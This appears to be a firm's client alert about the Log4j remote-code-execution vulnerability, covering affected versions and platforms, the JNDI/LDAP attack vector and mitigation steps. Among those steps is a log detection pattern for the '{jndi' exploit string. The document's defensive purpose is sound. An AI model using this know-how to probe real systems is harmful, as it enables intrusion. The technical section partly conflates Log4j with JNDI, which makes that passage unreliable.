As you have likely heard by now, the broader business community is susceptible to a software vulnerability that, if exploited, can impact the majority of our organizations. You can view the original article regarding this vulnerability on the NIST website here.
Please read on for more details, but if you believe your business has been compromised as a result of this vulnerability, please contact your JKJ team immediately to discuss next steps.
Less Technical Explanation:
Identified on December 9th by a security researcher, the vulnerability in Log4j could allow an unauthorized user to gain elevated privileges on a computer, and potentially allow unauthenticated users to execute malicious commands on systems. The Log4j utility is commonly included in Java based third party software and multiple Apache web frameworks. The vulnerability impacts a large number of web applications. It can impact both Internet facing systems and possibly internal systems depending on the setup of the system.
More Technical Explanation:
Log4j is a popular open-source Java logging library which sits under many applications and is incorporated into Apache web servers, such as ApacheStruts2, Apache Solr, Apache Druid and Apache Flink. It uses the Java Naming and Directory Interface (“JNDI”) and supports Lightweight Directory Access Protocol (LDAP). The library has been present in Java since the late 1990s and provides an abstract interface for different name resolution and directory services. The LDAP JNDI handler allows remote code injection.
Any Java-based application may be vulnerable, but the following platforms running Java have been identified as vulnerable:
- Amazon Web Services (AWS) Lambda
- Apache Software Foundation (Flink)
- Debian Project (GNU/Linux)
- FreeBSD
- IBM (WebSphere Application Server)
- NetApp (Cloud Manager, SnapCenter)
- Red Hat
- Sophos (Cloud Optix)
- Ubiquiti
- VMware (Horizon, vCenter Server)
Impacted versions include version 2 of Log4j between versions 2.0-beta-9 and 2.14.1. The vulnerability impacts version 1 of Log4j if using the JMS Appender. Impacts all versions of Log4j2 from 2.0-beta9 to 2.14.1 Platforms/Usage of Apache Struts.
The threat actor must have access to an endpoint or interface that would enable them to send the exploit string and a log statement that records the string from that request.
Remediation:
All organizations should ensure the following:
- Review all application and logging servers that may leverage Log4j. This can impact both publicly facing servers as well as internal servers based on where the logs traverse and Log4j is used. It is important to understand what logging exists that could capture malicious requests from the web front end and log it on other vulnerable servers.
- Assess third party products in your environment and identify whether they are vulnerable. You can monitor security centers for the products or contact your account representatives for guidance.
- Ensure your network security technology is blocking all known indicators for this vulnerability.
- Ensure EDR (endpoint detection & response) technology is running on all servers.
- Monitor log files for the string “{jndi”. This represents scanning activity which could lead to the compromise of the system.
If you manage an application using the Log4j package:
- If you are unsure which version you are running, search for the file hashes listed here to determine if you are potentially vulnerable.
- Upgrade to the latest version log4j v2.15 (this will fix the vulnerability).
- https://jkj.com/blog/cybersecurity-alert-log4j-vulnerability/
- If you are using a vulnerable version and cannot upgrade, do one of the following:For releases >=2.10: Set the property “log4j2.formatMsgNoLookups” or “LOG4J_FORMAT_MSG_NO_LOOKUPS” to “true”.
- For releases 2.0-beta9 to 2.10.0: Remove the JndiLookup class from the classpath.
Additional information on mitigations is available here. Additionally, CrowdStrike provides additional technical analysis and mitigation recommendations to consider here and CISA gives direction here.
If there is a possibility your business has been compromised as a result of this vulnerability, please contact your JKJ team immediately to discuss next steps.
